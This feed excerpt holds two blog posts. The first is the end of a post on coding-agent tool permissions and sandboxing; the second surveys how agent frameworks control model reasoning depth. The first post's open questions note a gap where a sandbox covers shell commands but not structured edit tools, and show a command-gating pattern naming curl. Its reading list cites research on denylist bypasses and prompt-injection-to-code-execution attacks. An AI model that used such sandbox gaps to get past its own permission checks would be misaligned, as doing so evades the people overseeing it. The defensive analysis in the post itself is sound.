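# The agent's actual action: a plain shell edit (sed into a temp copy,
# then move -- portable across GNU and BSD sed).
subprocess.run(
    f"sed 's/hello/goodbye/' {path} > {path}.new && mv {path}.new {path}",
    shell=True, check=True,
)

with open(path) as f:
    after = f.readlines()

# What the UI shows: a reviewable diff, not the sed invocation.
diff = "".join(difflib.unified_diff(before, after,
                                    fromfile="app.py", tofile="app.py"))
```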

&lt;h2&gt;
  
  
  Open questions
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Is the structured-tool bypass a solvable problem?&lt;/strong&gt; Claude Code's sandbox covers bash but not Edit/Write. Could a unified sandbox cover both? The challenge: structured tools run in-process, so sandboxing them requires sandboxing the agent process itself — which Codex CLI does but others don't.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Should bash be the default or the escape hatch?&lt;/strong&gt; Codex CLI ships structured tools as defaults and bash as an option. Aider has no structured tools at all — everything goes through the LLM's edit format plus shell. Which produces better agent behavior?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Can capability-based sandboxing replace command-level gating?&lt;/strong&gt; Instead of &lt;code&gt;Bash(npm run *)&lt;/code&gt;, declare &lt;code&gt;capability: process.spawn(npm)&lt;/code&gt;. Instead of &lt;code&gt;Bash(curl *)&lt;/code&gt;, declare &lt;code&gt;capability: net.http&lt;/code&gt;. Is this more maintainable than regex-based command matching?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;How should &lt;a href="https://openwalrus.xyz/blog/agent-calling-patterns" rel="noopener noreferrer"&gt;multi-agent systems&lt;/a&gt; inherit permissions?&lt;/strong&gt; When a parent agent delegates to a sub-agent, does the sub-agent get the parent's full bash access? A subset? No bash at all? Current frameworks &lt;a href="https://openwalrus.xyz/blog/multi-agent-coordination" rel="noopener noreferrer"&gt;don't coordinate permissions across agents&lt;/a&gt; any more than they coordinate &lt;a href="https://openwalrus.xyz/blog/context-compaction" rel="noopener noreferrer"&gt;context compaction&lt;/a&gt;.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;What does "observable permissions" look like?&lt;/strong&gt; For a system where &lt;a href="https://openwalrus.xyz/blog/agent-task-registry" rel="noopener noreferrer"&gt;task state is a runtime primitive&lt;/a&gt;, permission grants and denials should appear in the task tree. When a tool is blocked, the parent should know — not just the agent that attempted it.&lt;/p&gt;

&lt;h2&gt;
  
  
  Further reading
&lt;/h2&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://code.claude.com/docs/en/permissions" rel="noopener noreferrer"&gt;Claude Code Permissions&lt;/a&gt; — five permission modes, pattern-based specifiers&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://code.claude.com/docs/en/sandboxing" rel="noopener noreferrer"&gt;Claude Code Sandboxing&lt;/a&gt; — OS-level isolation for bash&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://developers.openai.com/codex/agent-approvals-security/" rel="noopener noreferrer"&gt;Codex CLI Security&lt;/a&gt; — sandbox-first architecture&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://flatt.tech/research/posts/pwning-claude-code-in-8-different-ways/" rel="noopener noreferrer"&gt;Flatt Security: 8 Bypasses (CVE-2025-66032)&lt;/a&gt; — why denylists fail&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://www.backslash.security/blog/cursor-ai-security-flaw-autorun-denylist" rel="noopener noreferrer"&gt;Backslash Security: Cursor Denylist&lt;/a&gt; — mathematical proof of denylist impossibility&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://blog.trailofbits.com/2025/10/22/prompt-injection-to-rce-in-ai-agents/" rel="noopener noreferrer"&gt;Trail of Bits: Prompt Injection to RCE&lt;/a&gt; — allowlisted commands weaponized via argument injection&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2412.14470" rel="noopener noreferrer"&gt;Agent-SafetyBench&lt;/a&gt; — no agent scores above 60% on safety&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2504.19793" rel="noopener noreferrer"&gt;ToolHijacker (NDSS 2026)&lt;/a&gt; — 96.7% success rate on tool selection manipulation&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2509.22040" rel="noopener noreferrer"&gt;"Your AI, My Shell"&lt;/a&gt; — 75–88% command execution success via prompt injection&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://arxiv.org/abs/2601.08012" rel="noopener noreferrer"&gt;Verifiably Safe Tool Use&lt;/a&gt; — formal safety specifications for agent tools&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://developer.nvidia.com/blog/practical-security-guidance-for-sandboxing-agentic-workflows-and-managing-execution-risk/" rel="noopener noreferrer"&gt;NVIDIA: Sandboxing Agentic Workflows&lt;/a&gt; — agent-in-sandbox architecture&lt;/li&gt;
&lt;/ul&gt;




&lt;p&gt;&lt;em&gt;Originally published at &lt;a href="https://openwalrus.xyz/blog/tool-call-permissions" rel="noopener noreferrer"&gt;OpenWalrus&lt;/a&gt;.&lt;/em&gt;&lt;/p&gt;

</description>
      <category>ai</category>
      <category>research</category>
      <category>opensource</category>
      <category>openwalrus</category>
    </item>
    <item>
      <title>How AI frameworks control model thinking</title>
      <dc:creator>clearloop</dc:creator>
      <pubDate>Sun, 15 Mar 2026 17:54:15 +0000</pubDate>
      <link>https://forem.com/crabtalk/how-ai-frameworks-control-model-thinking-4fi</link>
      <guid>https://forem.com/crabtalk/how-ai-frameworks-control-model-thinking-4fi</guid>
      <description>&lt;p&gt;Every reasoning model can think harder if you ask it to. Claude has &lt;code&gt;budget_tokens&lt;/code&gt; and &lt;code&gt;effort&lt;/code&gt;. OpenAI has &lt;code&gt;reasoning_effort&lt;/code&gt;. Google has thinking levels. The API surface exists. The question is: who decides when to use it?&lt;/p&gt;

&lt;p&gt;We surveyed seven agent frameworks — Claude Code, Cursor, OpenClaw, GitHub Copilot, Windsurf, Aider, and Devin — to understand how they handle model thinking. The approaches split into three camps: frameworks that actively control reasoning depth via API parameters, frameworks that shape thinking through prompts and architecture, and frameworks that don't try to control it at all.&lt;/p&gt;

&lt;h2&gt;
  
  
  The three approaches
&lt;/h2&gt;

&lt;h3&gt;
  
  
  API-parameter-controlled
&lt;/h3&gt;

&lt;p&gt;The framework translates user intent or task signals into provider-specific API parameters — &lt;code&gt;thinking.budget_tokens&lt;/code&gt;, &lt;code&gt;reasoning_effort&lt;/code&gt;, &lt;code&gt;effort&lt;/code&gt; — before the request reaches the model. The model receives explicit instructions about how hard to think.&lt;/p&gt;

&lt;h3&gt;
  
  
  Prompt and architecture controlled
&lt;/h3&gt;

&lt;p&gt;The framework doesn't touch reasoning API parameters. Instead, it shapes thinking through prompt design ("think step by step"), model selection (use a reasoning model for planning, a fast model for editing), or model routing (analyze the request and pick the right tier). The control is indirect.&lt;/p&gt;

&lt;h3&gt;
  
  
  Let it go
&lt;/h3&gt;

&lt;p&gt;The framework sends the prompt to whichever model the user selected and lets the model decide how to reason. No API parameter tuning, no prompt engineering for reasoning depth, no dynamic routing. The user is the router.&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;/p&gt;

&lt;h2&gt;
  
  
  Framework-by-framework
&lt;/h2&gt;

&lt;h3&gt;
  
  
  Claude Code — from keyword hacks to adaptive thinking
&lt;/h3&gt;

&lt;p&gt;Claude Code has gone through three distinct eras of thinking control.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Era 1: keyword interception.&lt;/strong&gt; Claude Code detected keywords in user prompts and mapped them to &lt;code&gt;budget_tokens&lt;/code&gt; values. "think" mapped to 4,000 tokens. "megathink" mapped to 10,000. "ultrathink" mapped to 32,000 (the maximum). The model never saw these keywords — they were intercepted by Claude Code's preprocessing layer. It was a hack, and &lt;a href="https://decodeclaude.com/ultrathink-deprecated/" rel="noopener noreferrer"&gt;Anthropic deprecated it&lt;/a&gt; in January 2026.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Era 2: always-on extended thinking.&lt;/strong&gt; After deprecation, extended thinking was enabled by default with maximum budget on every request. This worked but was wasteful — simple questions like "what does this function do?" triggered 32K tokens of thinking.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Era 3: adaptive thinking (current).&lt;/strong&gt; The current system uses two &lt;a href="https://platform.claude.com/docs/en/build-with-claude/adaptive-thinking" rel="noopener noreferrer"&gt;API parameters&lt;/a&gt; together:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;thinking.type: "adaptive"&lt;/code&gt; — Claude dynamically decides &lt;em&gt;whether&lt;/em&gt; and &lt;em&gt;how much&lt;/em&gt; to think based on request complexity&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;output_config.effort&lt;/code&gt; — a soft guidance signal with levels: &lt;code&gt;low&lt;/code&gt;, &lt;code&gt;medium&lt;/code&gt;, &lt;code&gt;high&lt;/code&gt; (default), &lt;code&gt;max&lt;/code&gt; (Opus only)&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;The &lt;code&gt;/effort&lt;/code&gt; command in the CLI lets users switch between low, medium, and high. At high effort, Claude almost always thinks. At lower levels, it may skip thinking entirely for simple problems. Crucially, effort is &lt;a href="https://platform.claude.com/docs/en/build-with-claude/effort" rel="noopener noreferrer"&gt;"a behavioral signal, not a strict token budget"&lt;/a&gt; — the model can still think more or less than the level suggests.&lt;/p&gt;
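&lt;p&gt;A sketch of how a CLI-level &lt;code&gt;/effort&lt;/code&gt; toggle could assemble these two fields — the field names are the ones from the adaptive-thinking docs cited above, but the surrounding request shape is illustrative, not a complete API payload:&lt;/p&gt;

```python
VALID_EFFORT = ("low", "medium", "high", "max")  # max: Opus only

def build_request(prompt, effort="high"):
    if effort not in VALID_EFFORT:
        raise ValueError(f"unknown effort level: {effort}")
    return {
        "messages": [{"role": "user", "content": prompt}],
        "thinking": {"type": "adaptive"},     # model decides whether/how much
        "output_config": {"effort": effort},  # soft signal, not a token budget
    }

req = build_request("Refactor this function", effort="low")
```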

&lt;p&gt;&lt;strong&gt;Classification: API-parameter-controlled.&lt;/strong&gt; Claude Code actively manages reasoning depth via API parameters, with the model making the final adaptive decision.&lt;/p&gt;

&lt;h3&gt;
  
  
  Cursor — the user is the router
&lt;/h3&gt;

&lt;p&gt;Cursor does not control thinking depth. At all.&lt;/p&gt;

&lt;p&gt;Users pick which model to use from a &lt;a href="https://docs.cursor.com/guides/selecting-models" rel="noopener noreferrer"&gt;dropdown&lt;/a&gt; — GPT-4o, Claude Sonnet, Claude Opus, o3, Gemini. If you want deeper thinking, you select a thinking model. If you want speed, you select a fast model. Cursor's "&lt;a href="https://forum.cursor.com/t/cursor-4-7-auto-model-selection/70488" rel="noopener noreferrer"&gt;Auto mode&lt;/a&gt;" picks a reliable model from the available pool, but the official documentation states it "does not route based on task type."&lt;/p&gt;

&lt;p&gt;No &lt;code&gt;reasoning_effort&lt;/code&gt; parameter. No &lt;code&gt;budget_tokens&lt;/code&gt;. No dynamic model routing based on task complexity. The user decides.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Classification: let it go.&lt;/strong&gt; Cursor outsources the thinking control decision entirely to the user.&lt;/p&gt;

&lt;h3&gt;
  
  
  OpenClaw — seven thinking levels and a router
&lt;/h3&gt;

&lt;p&gt;OpenClaw has the most &lt;a href="https://docs.openclaw.ai/tools/thinking" rel="noopener noreferrer"&gt;sophisticated thinking control&lt;/a&gt; of any framework examined.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Seven levels&lt;/strong&gt;: &lt;code&gt;off&lt;/code&gt;, &lt;code&gt;minimal&lt;/code&gt;, &lt;code&gt;low&lt;/code&gt;, &lt;code&gt;medium&lt;/code&gt;, &lt;code&gt;high&lt;/code&gt;, &lt;code&gt;xhigh&lt;/code&gt;, &lt;code&gt;adaptive&lt;/code&gt;. Each has natural-language aliases — "think" maps to &lt;code&gt;minimal&lt;/code&gt;, "ultrathink" to &lt;code&gt;high&lt;/code&gt;. The framework translates these into provider-specific parameters: Anthropic's &lt;code&gt;budget_tokens&lt;/code&gt;, OpenAI's &lt;code&gt;reasoning_effort&lt;/code&gt;, or binary on/off for providers like Z.AI and Moonshot that only support a toggle.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Resolution hierarchy&lt;/strong&gt; (highest priority first):&lt;/p&gt;

&lt;ol&gt;
&lt;li&gt;Inline directive in current message (&lt;code&gt;/t &amp;lt;level&amp;gt;&lt;/code&gt;, &lt;code&gt;/think:&amp;lt;level&amp;gt;&lt;/code&gt;)&lt;/li&gt;
&lt;li&gt;Session override&lt;/li&gt;
&lt;li&gt;Per-agent configuration&lt;/li&gt;
&lt;li&gt;Per-model default&lt;/li&gt;
&lt;li&gt;Global default&lt;/li&gt;
&lt;li&gt;Fallback: &lt;code&gt;adaptive&lt;/code&gt; for Claude, &lt;code&gt;low&lt;/code&gt; for other reasoning models, &lt;code&gt;off&lt;/code&gt; otherwise&lt;/li&gt;
&lt;/ol&gt;
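&lt;p&gt;The hierarchy is a first-match-wins walk down those six sources. A minimal sketch, with illustrative names:&lt;/p&gt;

```python
# First-match-wins resolution over the six sources listed above.
# Function and parameter names are illustrative, not OpenClaw's API.
def is_reasoning_model(name: str) -> bool:
    # Crude stand-in; real metadata would come from a model registry.
    return any(tag in name.lower() for tag in ("o3", "r1", "reasoner"))

def resolve_thinking_level(message_directive, session_override,
                           agent_config, model_default, global_default,
                           model_name):
    for source in (message_directive, session_override, agent_config,
                   model_default, global_default):
        if source is not None:
            return source
    # Step 6: fallback tier depends on the model family.
    if "claude" in model_name.lower():
        return "adaptive"
    if is_reasoning_model(model_name):
        return "low"
    return "off"
```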

&lt;p&gt;&lt;strong&gt;Dynamic model routing&lt;/strong&gt;: Separately from thinking levels, OpenClaw supports &lt;a href="https://github.com/BlockRunAI/ClawRouter" rel="noopener noreferrer"&gt;ClawRouter&lt;/a&gt; — a 15-dimension weighted scorer that analyzes token count, code presence, reasoning markers, technical terms, and multi-step patterns to route requests to LIGHT (Haiku), MEDIUM (Sonnet), or HEAVY (Opus) tiers. It runs locally with under 1ms latency. A key design choice: it scores only user messages, not the system prompt, to avoid the large system prompt inflating every request to the most expensive tier.&lt;/p&gt;
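&lt;p&gt;The routing idea fits in a few lines: score the user message on weighted features, then threshold into tiers. The real router uses 15 dimensions; the four features, weights, and thresholds below are invented for illustration:&lt;/p&gt;

```python
# Toy version of ClawRouter-style pre-request routing: weighted feature
# scoring of the user message only (never the system prompt), thresholded
# into tiers. All weights and thresholds here are invented.
import re

WEIGHTS = {"length": 0.3, "code": 0.25, "reasoning_markers": 0.25,
           "multi_step": 0.2}

def score(message: str) -> float:
    feats = {
        "length": min(len(message.split()) / 200, 1.0),
        "code": 1.0 if re.search(r"def |class |fn |#include", message) else 0.0,
        "reasoning_markers": 1.0 if re.search(
            r"\b(why|prove|tradeoff|design|architect)\b", message, re.I) else 0.0,
        "multi_step": 1.0 if re.search(r"\b(then|first|finally|step)\b",
                                       message, re.I) else 0.0,
    }
    return sum(WEIGHTS[k] * v for k, v in feats.items())

def route(message: str) -> str:
    s = score(message)
    if s < 0.25:
        return "LIGHT"   # e.g. Haiku
    if s < 0.6:
        return "MEDIUM"  # e.g. Sonnet
    return "HEAVY"       # e.g. Opus
```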

&lt;p&gt;&lt;strong&gt;Classification: API-parameter-controlled + dynamic routing.&lt;/strong&gt; OpenClaw both controls reasoning depth per-request and routes requests to models of different capability.&lt;/p&gt;

&lt;h3&gt;
  
  
  GitHub Copilot — reasoning controls are coming
&lt;/h3&gt;

&lt;p&gt;Copilot's approach is still evolving. Users can &lt;a href="https://github.blog/ai-and-ml/github-copilot/under-the-hood-exploring-the-ai-models-powering-github-copilot/" rel="noopener noreferrer"&gt;switch models mid-session&lt;/a&gt; with &lt;code&gt;/model&lt;/code&gt;, choosing from Claude Opus, Sonnet, GPT-5.3-Codex, GPT-5 mini, GPT-4.1, and Gemini 3 Pro. The &lt;a href="https://github.blog/changelog/2026-02-25-github-copilot-cli-is-now-generally-available/" rel="noopener noreferrer"&gt;Copilot CLI changelog&lt;/a&gt; mentions "configure reasoning effort for extended thinking models," but this appears backend-only — not yet exposed as a user-facing control.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Classification: let it go (transitioning to API-parameter-controlled).&lt;/strong&gt; Today, the user picks the model. Tomorrow, Copilot may expose reasoning effort controls.&lt;/p&gt;

&lt;h3&gt;
  
  
  Windsurf — model variants as reasoning levels
&lt;/h3&gt;

&lt;p&gt;Windsurf takes a distinctive approach. Instead of exposing API parameters, it &lt;a href="https://docs.windsurf.com/windsurf/models" rel="noopener noreferrer"&gt;pre-configures model variants&lt;/a&gt; in the model selector: "GPT-5.4 (Low Reasoning)", "GPT-5.4 (Medium Reasoning)", "GPT-5.4 (High Reasoning)", "GPT-5.4 (Extra High Reasoning)". Similarly, "Claude Opus 4.6 (Thinking)" appears as a separate entry from standard Claude Opus.&lt;/p&gt;

&lt;p&gt;Windsurf's custom &lt;a href="https://windsurf.com/blog/windsurf-wave-9-swe-1" rel="noopener noreferrer"&gt;SWE-1 model family&lt;/a&gt; takes this further with "variable thinking" — the model dynamically adjusts reasoning depth based on task complexity. Quick responses for simple tasks, deeper analysis for complex ones. This is native to the model, not framework-level control.&lt;/p&gt;

&lt;p&gt;Different variants consume different amounts of prompt credits, making the cost-quality tradeoff visible to users.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Classification: API-parameter-controlled (via variant selection).&lt;/strong&gt; Windsurf bakes reasoning levels into selectable model configurations rather than exposing raw API parameters.&lt;/p&gt;

&lt;h3&gt;
  
  
  Aider — the most explicit controls
&lt;/h3&gt;

&lt;p&gt;Aider gives users &lt;a href="https://aider.chat/docs/config/reasoning.html" rel="noopener noreferrer"&gt;direct access to reasoning parameters&lt;/a&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;
&lt;code&gt;--reasoning-effort low|medium|high&lt;/code&gt; for OpenAI's &lt;code&gt;reasoning_effort&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;code&gt;--thinking-tokens 1k|8k|32k&lt;/code&gt; for Anthropic's &lt;code&gt;budget_tokens&lt;/code&gt;
&lt;/li&gt;
&lt;li&gt;In-chat commands: &lt;code&gt;/thinking-tokens 4k&lt;/code&gt;, &lt;code&gt;/reasoning-effort low&lt;/code&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Aider uses model metadata (&lt;code&gt;accepts_settings&lt;/code&gt;) to determine which parameters each model supports and warns you if you try to set an unsupported parameter.&lt;/p&gt;
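&lt;p&gt;That gating logic can be sketched as follows — the metadata table here is invented for illustration; Aider's real &lt;code&gt;accepts_settings&lt;/code&gt; data lives in its model-metadata files:&lt;/p&gt;

```python
# Sketch of metadata-gated parameter passing: consult per-model
# accepts_settings before sending a reasoning parameter, and warn
# instead of failing. The metadata table below is illustrative.
import warnings

MODEL_SETTINGS = {
    "o3-mini": {"accepts_settings": ["reasoning_effort"]},
    "claude-3-7-sonnet": {"accepts_settings": ["thinking_tokens"]},
    "gpt-4o": {"accepts_settings": []},
}

def apply_reasoning_setting(model: str, setting: str, value):
    accepted = MODEL_SETTINGS.get(model, {}).get("accepts_settings", [])
    if setting not in accepted:
        warnings.warn(f"{model} does not accept {setting}; ignoring")
        return {}
    return {setting: value}
```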

&lt;p&gt;But Aider's most significant contribution to thinking control is architectural. The &lt;a href="https://aider.chat/2024/09/26/architect.html" rel="noopener noreferrer"&gt;Architect/Editor pattern&lt;/a&gt; separates reasoning from editing:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;An &lt;strong&gt;Architect&lt;/strong&gt; model (often a reasoning model like o1 or R1) describes &lt;em&gt;how&lt;/em&gt; to solve the problem&lt;/li&gt;
&lt;li&gt;An &lt;strong&gt;Editor&lt;/strong&gt; model (often GPT-4o or Sonnet) translates that plan into precise file edits&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This produced &lt;a href="https://aider.chat/2025/01/24/r1-sonnet.html" rel="noopener noreferrer"&gt;state-of-the-art results&lt;/a&gt;: DeepSeek R1 as architect + Sonnet as editor achieved 64.0% on the aider polyglot benchmark at 14x less cost than the previous o1 SOTA. The insight: instead of making one model think harder, use two models — one for reasoning, one for execution. This mirrors the &lt;a href="https://openwalrus.xyz/blog/plans-vs-tasks-agent-design" rel="noopener noreferrer"&gt;plan-vs-task separation&lt;/a&gt; we explored in agent design — plans are for reasoning, tasks are for execution.&lt;/p&gt;
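&lt;p&gt;Reduced to its control flow, the pattern is two completion calls in sequence. &lt;code&gt;complete&lt;/code&gt; is any caller-supplied &lt;code&gt;(model, prompt) -&amp;gt; text&lt;/code&gt; function; the model names and prompts are examples from the post, not required pairings:&lt;/p&gt;

```python
# The Architect/Editor split as a two-call pipeline: a reasoning model
# describes HOW to solve the problem, then a cheaper editor model turns
# that plan into concrete edits. `complete` is supplied by the caller.
def architect_editor(task, files, complete):
    plan = complete(
        "deepseek-r1",  # architect: reasons about the approach
        f"Task: {task}\nFiles: {sorted(files)}\n"
        "Describe the changes needed. Do not write diffs.",
    )
    edits = complete(
        "claude-sonnet",  # editor: translates the plan into precise edits
        f"Plan:\n{plan}\n\nProduce exact search/replace edits for the files.",
    )
    return edits
```

The expensive model never touches file-editing syntax, and the cheap model never has to reason from scratch — which is where the cost savings come from.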

&lt;p&gt;&lt;strong&gt;Classification: API-parameter-controlled + architectural.&lt;/strong&gt; Aider both exposes raw API parameters and introduces a model-pair architecture that implicitly controls where reasoning happens.&lt;/p&gt;

&lt;h3&gt;
  
  
  Devin — the black box
&lt;/h3&gt;

&lt;p&gt;Devin doesn't expose thinking controls because Devin isn't a wrapper around a single model. It's a &lt;a href="https://cognition.ai/blog/devin-annual-performance-review-2025" rel="noopener noreferrer"&gt;compound AI system&lt;/a&gt; — "a diverse set of model inferences to plan, act, evaluate, and use tools." Users set a spend limit per ticket (e.g., $5.00), and Devin allocates reasoning resources internally.&lt;/p&gt;

&lt;p&gt;Cognition's blog describes Devin building &lt;a href="https://cognition.ai/blog/devin-2" rel="noopener noreferrer"&gt;explicit mechanisms to model user intent&lt;/a&gt; "across hundreds of millions of agent decisions." The internal architecture is proprietary. From the outside, it's a black box that thinks as hard as it thinks.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Classification: let it go (proprietary compound system).&lt;/strong&gt; Devin controls thinking internally but gives users no knobs to turn.&lt;/p&gt;

&lt;h2&gt;
  
  
  The landscape at a glance
&lt;/h2&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Framework&lt;/th&gt;
&lt;th&gt;Approach&lt;/th&gt;
&lt;th&gt;Thinking levels&lt;/th&gt;
&lt;th&gt;Dynamic routing&lt;/th&gt;
&lt;th&gt;User control&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Claude Code&lt;/td&gt;
&lt;td&gt;API parameters&lt;/td&gt;
&lt;td&gt;4 (low/med/high/max)&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;
&lt;code&gt;/effort&lt;/code&gt; command&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Cursor&lt;/td&gt;
&lt;td&gt;Let it go&lt;/td&gt;
&lt;td&gt;None&lt;/td&gt;
&lt;td&gt;No (heuristic Auto)&lt;/td&gt;
&lt;td&gt;Model dropdown&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;OpenClaw&lt;/td&gt;
&lt;td&gt;API params + routing&lt;/td&gt;
&lt;td&gt;7 levels + aliases&lt;/td&gt;
&lt;td&gt;Yes (ClawRouter)&lt;/td&gt;
&lt;td&gt;Inline &lt;code&gt;/t&lt;/code&gt;, per-agent config&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Copilot&lt;/td&gt;
&lt;td&gt;Let it go (transitioning)&lt;/td&gt;
&lt;td&gt;Emerging&lt;/td&gt;
&lt;td&gt;No&lt;/td&gt;
&lt;td&gt;Model selector&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Windsurf&lt;/td&gt;
&lt;td&gt;Pre-configured variants&lt;/td&gt;
&lt;td&gt;4 per model&lt;/td&gt;
&lt;td&gt;Partial (SWE-1)&lt;/td&gt;
&lt;td&gt;Variant selector&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Aider&lt;/td&gt;
&lt;td&gt;API params + architecture&lt;/td&gt;
&lt;td&gt;Direct param access&lt;/td&gt;
&lt;td&gt;Architect/Editor&lt;/td&gt;
&lt;td&gt;CLI flags + in-chat commands&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Devin&lt;/td&gt;
&lt;td&gt;Black box&lt;/td&gt;
&lt;td&gt;Internal&lt;/td&gt;
&lt;td&gt;Internal&lt;/td&gt;
&lt;td&gt;Spend limit only&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h2&gt;
  
  
  What the research says
&lt;/h2&gt;

&lt;p&gt;The academic consensus is clear on one thing: &lt;strong&gt;more thinking tokens is not always better.&lt;/strong&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://arxiv.org/abs/2505.17813" rel="noopener noreferrer"&gt;Don't Overthink It&lt;/a&gt; (Hassid et al., 2025) found that shorter reasoning chains are up to &lt;strong&gt;34.5% more accurate&lt;/strong&gt; than the longest chain sampled for the same question. Their &lt;code&gt;short-m@k&lt;/code&gt; method achieves similar or superior accuracy while using &lt;strong&gt;40% fewer thinking tokens&lt;/strong&gt;.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://arxiv.org/abs/2512.19585" rel="noopener noreferrer"&gt;Increasing the Thinking Budget is Not All You Need&lt;/a&gt; demonstrated that alternative strategies — self-consistency, self-reflection — outperform simply raising the thinking budget. More tokens doesn't mean better reasoning.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://arxiv.org/abs/2602.13517" rel="noopener noreferrer"&gt;Think Deep, Not Just Long&lt;/a&gt; introduced the "deep-thinking ratio" metric, showing that raw token counts are unreliable proxies for reasoning quality. Increased generation length doesn't consistently correlate with accuracy and may signal "overthinking" that degrades performance.&lt;br&gt;
&lt;em&gt;[Interactive chart — see original post]&lt;/em&gt;&lt;br&gt;
The most promising direction is &lt;strong&gt;self-budgeting&lt;/strong&gt;: having the model estimate its own needed compute. &lt;a href="https://arxiv.org/abs/2412.18547" rel="noopener noreferrer"&gt;TALE&lt;/a&gt; (ACL 2025) reduces output token costs by &lt;strong&gt;67%&lt;/strong&gt; while maintaining competitive accuracy by letting the model allocate its own reasoning budget.&lt;/p&gt;
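&lt;p&gt;Self-budgeting reduces to a two-pass shape: ask the model how many tokens it needs, then cap generation at that estimate. This is a hedged sketch of the general idea, not TALE's actual method; &lt;code&gt;estimate&lt;/code&gt; and &lt;code&gt;answer&lt;/code&gt; are caller-supplied completion functions, and the clamping bounds are invented:&lt;/p&gt;

```python
# Two-pass self-budgeting sketch (general idea only, not TALE's exact
# procedure): pass 1 asks for a token estimate, pass 2 answers under
# that cap. Floor/ceiling values are illustrative.
def self_budgeted_answer(question, estimate, answer,
                         floor=64, ceiling=4096):
    raw = estimate("How many output tokens does answering this need? "
                   "Reply with a number only.\n\n" + question)
    try:
        budget = int(raw.strip())
    except ValueError:
        budget = ceiling  # unparseable estimate: fall back to the ceiling
    budget = max(floor, min(budget, ceiling))  # clamp to sane bounds
    return answer(question, max_tokens=budget), budget
```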

&lt;p&gt;&lt;a href="https://nousresearch.com/measuring-thinking-efficiency-in-reasoning-models-the-missing-benchmark/" rel="noopener noreferrer"&gt;Nous Research&lt;/a&gt; found that open-weight reasoning models use &lt;strong&gt;1.5-4x more tokens&lt;/strong&gt; than closed models on identical tasks — up to &lt;strong&gt;10x&lt;/strong&gt; for simple knowledge questions. The per-token cost advantage of open models is often negated by their token inefficiency. For local-first runtimes, this efficiency gap matters even more — every wasted thinking token is wasted compute on your own hardware. (We explored this cost dynamic in &lt;a href="https://openwalrus.xyz/blog/why-we-built-openwalrus" rel="noopener noreferrer"&gt;why we built OpenWalrus&lt;/a&gt;.)&lt;/p&gt;

&lt;p&gt;A comprehensive &lt;a href="https://arxiv.org/abs/2507.02076" rel="noopener noreferrer"&gt;survey of adaptive test-time compute&lt;/a&gt; (Alomrani et al., 2025) frames the problem cleanly: current models are inefficient because they "often overthink simple problems while underthinking hard ones." The field is moving from fixed budgets to adaptive allocation.&lt;/p&gt;

&lt;h2&gt;
  
  
  Open questions
&lt;/h2&gt;

&lt;p&gt;The landscape reveals several tensions without clear resolutions:&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Should the framework or the model decide?&lt;/strong&gt; Anthropic's adaptive thinking lets Claude decide when to think. OpenClaw's ClawRouter decides which model to use. Aider's architect/editor pattern decides where reasoning happens. Each delegates the decision to a different layer. Which one is closest to the signal — the framework that sees the user's full history, the model that understands the problem, or a lightweight router that can classify in under 1ms?&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Is the Architect/Editor pattern the real answer?&lt;/strong&gt; Aider's approach sidesteps the "how hard should this model think" question entirely. Instead of making one model think harder, it uses a reasoning model for planning and a fast model for editing — achieving SOTA results at &lt;a href="https://aider.chat/2025/01/24/r1-sonnet.html" rel="noopener noreferrer"&gt;14x less cost&lt;/a&gt;. Does this generalize beyond coding, or is it specific to tasks with a clean plan-then-execute structure?&lt;/p&gt;

